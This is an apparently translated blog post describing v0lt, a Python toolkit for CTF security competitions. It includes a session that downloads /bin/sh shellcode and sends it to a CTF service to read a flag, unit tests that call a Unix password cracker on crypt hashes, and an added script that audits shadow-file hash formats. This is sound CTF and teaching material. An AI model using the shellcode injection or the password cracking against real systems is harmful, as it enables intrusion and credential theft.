0×00 v0lt
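v0lt is my attempt to regroup every security CTF tool I have used, currently use, or will use into a single Python toolkit. Practical tasks could be solved with bash scripts, but I find Python more flexible, which is why I made this choice. It has nothing to do with pwntools, developed by the Danish CTF team Gallopsled; v0lt is just a small, flexible toolkit with a few specific features.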
0×01 Requirements and installation
Dependencies:
- Libmagic
- Python3
- BeautifulSoup
- Requests
- filemagic
- hexdump
- passlib
Installation:

```
git clone https://github.com/P1kachu/v0lt.git
cd v0lt
[sudo] python3 setup.py install  # sudo is required because some dependencies may be missing
```
Example: Shellcodes

```
>>> from v0lt import *
>>> nc = Netcat("archpichu.ddns.net", 65102)
Connected to port 65102
>>> print(nc.read())
GIVE ME SHELLCODZ
>>> shellhack = ShellHack(4096, "bin", "execve")
>>> shellhack.get_shellcodes(shellhack.keywords)

...<SNIPPED>...
85: Linux/x86:setuid(0) & execve(/sbin/poweroff -f) - 47 bytes
86: Linux/x86:execve (/bin/sh) - 21 Bytes
87: Linux/x86:break chroot execve /bin/sh - 80 bytes
88: Linux/x86:execve(/bin/sh, 0, 0) - 21 bytes
...<SNIPPED>...

Selection: 86
Your choice: http://shell-storm.org/shellcode/files/shellcode-752.php
Shellcode: "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]"

>>> nc.shellcat(shellhack.shellcode)
>>> nc.writeln(shellhack.pad())
>>> exploit = nc.dialogue("cat flag", 3)
>>> print(exploit)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: File name too long
P1kaCTF{sh3llc0de_1s_e4zY}
```
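Implemented features:
Crypto
- Base64
- Caesar shift
- Hashing functions (SHA, MD5)
- Bit manipulation (XOR, inverse XOR)
- Usual conversions (bytes, strings, hex)
- RSA basics (modular inverse, inverse power, an egcd script for the RSA common-modulus attack…)
- Brute forcing (dictionary-based, custom words)
Shellcodes
- Shellcode selection and download from the Shell-storm repository (Jonathan Salwan's personal website)
- Shellcode formatting
- Shell{cat,net}: sending shellcode made easy
- Automatic padding
Connection support
- Netcat
- Telnet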
More examples available:

```python
import unittest
from v0lt import *

__author__ = 'P1kachu'


class Tests(unittest.TestCase):
    # Network helpers: both tests need the remote test service to be reachable.
    def test_netcat(self):
        nc = Netcat("archpichu.ddns.net", 65103)
        self.assertEqual(nc.read(), "\nNothing to display yet...\n")

    def test_telnet(self):
        tl = Telnet("archpichu.ddns.net", 65103)
        self.assertEqual(tl.read(), "\nNothing to display yet...\n")

    def test_stack(self):
        stack = Stack()
        self.assertEqual(stack.size(), 0)
        stack.push("item")
        self.assertEqual(stack.is_empty(), False)
        self.assertEqual(stack.size(), 1)
        item = stack.pop()
        self.assertEqual(stack.size(), 0)
        self.assertEqual(item, "item")
        self.assertEqual(stack.is_empty(), True)

    def test_basic_ceasar(self):
        plaintext = "This is a ceasar plaintext"
        encrypted = "GUVF VF N PRNFNE CYNVAGRKG"
        deciphered = basic_ceasar(plaintext, offset=13)
        self.assertEqual(encrypted, deciphered)

    def test_get_shellcode(self):
        sh = ShellHack(70, "/bin/lol")
        sh.get_shellcodes(sh.keywords)
        sh = ShellHack(70, "/bin/sh")
        sh.get_shellcodes(sh.keywords)

    def test_flag_gen(self):
        flags_gen("flags.tmp", "P1ka", 10)

    def test_find_nth(self):
        self.assertEqual(find_nth("lolilol", "l", 3), 6)
        self.assertEqual(find_nth("lolilol", "l", 4), -1)

    # Not prefixed with "test_", so unittest does not collect this method.
    def brute(self):
        bf = Bruteforce(charset="abcd", final_length=5, begin_with="l", end_with="P")
        bf.generate_strings()
        bf = Bruteforce(charset="abcdef", final_length=12, begin_with="l", end_with="P")
        bf.generate_strings(output="bf.tmp")

    def test_hex(self):
        he = Hexeditor()
        he.dump_file("setup.py")
        he.save_file_as_hex("save.tmp")
        he.restore_file("test1.tmp")
        he.restore_file("test2.tmp", "save.tmp")

    def test_passwd_cracker(self):
        nix_basic_pass_cracker("HX9LLTdc/jiDE")
        nix_basic_pass_cracker("HX8LLTdc/jiDE")
        # nix_basic_pass_cracker("$1$khkWa1Nz$7YcmdOO1/uyHhMB7ga2L.1")
        # nix_basic_pass_cracker("$5$khkWa1Nz$583CsGZkoT82wh2ukf75KT4VVrf9ZO/P0FXLiPKgG//")
        # nix_basic_pass_cracker("$6$P1$XKg/SKZpe8Gbl5Utt3XVJEA4zJ6KB.IuZlShnP2FljfF32z3zoytnB.MaP9dJOObSOtiidHmeBp.feOqK4Mvg/")


if __name__ == "__main__":
    suite = unittest.defaultTestLoader.loadTestsFromTestCase(Tests)
    unittest.TextTestRunner().run(suite)
```
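The strings passed to `nix_basic_pass_cracker` in the tests above are crypt(3) password hashes in four different formats. As an added example (not part of v0lt or of the original post), the following code identifies the scheme of such a hash and lists the accounts in shadow-format text that still use DES or MD5 crypt. The names `classify` and `audit`, the user names and the shadow lines are constructed for illustration; the hash values are the ones from the test code.

```python
import re

H64 = r"[./0-9A-Za-z]"  # alphabet used by crypt(3) salts and digests
# Modular-crypt id -> (scheme name, digest length in characters, legacy scheme?)
SCHEMES = {"1": ("md5-crypt", 22, True),
           "5": ("sha256-crypt", 43, False),
           "6": ("sha512-crypt", 86, False)}
# Layout: $id$[rounds=N$]salt$digest
MCF = re.compile(r"^\$([156])\$(?:rounds=(\d+)\$)?([^$:]{1,16})\$(" + H64 + r"+)$")
# Traditional DES crypt: 2 salt characters followed by 11 digest characters
DES = re.compile(r"^(" + H64 + r"{2})" + H64 + r"{11}$")


def classify(field):
    """Describe one crypt(3) hash string: scheme, salt, rounds, needs_review."""
    m = DES.match(field)
    if m:
        return {"scheme": "des-crypt", "salt": m.group(1), "rounds": None, "needs_review": True}
    m = MCF.match(field)
    if m and not (m.group(1) == "1" and m.group(2)):  # md5-crypt has no rounds= field
        name, digest_len, legacy = SCHEMES[m.group(1)]
        if len(m.group(4)) == digest_len:
            rounds = int(m.group(2)) if m.group(2) else None
            return {"scheme": name, "salt": m.group(3), "rounds": rounds, "needs_review": legacy}
    # Truncated, corrupted or unsupported format: report it rather than guess
    return {"scheme": "unrecognised", "salt": None, "rounds": None, "needs_review": True}


# Constructed shadow-format sample: user names are invented, hashes are the page's test strings.
SAMPLE_SHADOW = """\
alice:HX9LLTdc/jiDE:16800:0:99999:7:::
bob:$1$khkWa1Nz$7YcmdOO1/uyHhMB7ga2L.1:16800:0:99999:7:::
carol:$5$khkWa1Nz$583CsGZkoT82wh2ukf75KT4VVrf9ZO/P0FXLiPKgG//:16800:0:99999:7:::
daemon:*:16800:0:99999:7:::
"""


def audit(shadow_text):
    """Return (user, scheme) for every account whose hash should be rotated or checked."""
    findings = []
    for line in shadow_text.splitlines():
        user, _, rest = line.partition(":")
        field = rest.split(":", 1)[0]
        if ":" not in line or field[:1] in ("*", "!"):  # not an entry, or locked account
            continue
        info = classify(field) if field else {"scheme": "empty-password", "needs_review": True}
        if info["needs_review"]:
            findings.append((user, info["scheme"]))
    return findings
```

Calling `audit(SAMPLE_SHADOW)` reports `alice` and `bob`; `carol` (SHA-256 crypt) and the locked `daemon` entry are not flagged.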
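0×02 Changelog
Only major features and changes are listed. Bug fixes and minor changes are omitted.
Version 1.3
- Many fixes, again
- Hexeditor (dump/rewrite files)
- Unix password brute forcing
Version 1.2
- Many changes, fixes and corrections to documentation, bugs and the framework
- Added the brute-force module
- Added some utilities for Linux
- Added Hexeditor
- Shellhack fixes
- Added warning messages
Version 1.0
- Many documentation changes
- Many bug fixes
- Added shellhack (shellcode reference tool)
- Added crypto tools
- Added networking tools
- Fixed the project tree
Translator's note:
Project author: P1kachu
Project homepage: https://github.com/P1kachu/v0lt
If you repost this, please credit the 4ido10n's Blog article "v0lt CTF Security Toolkit".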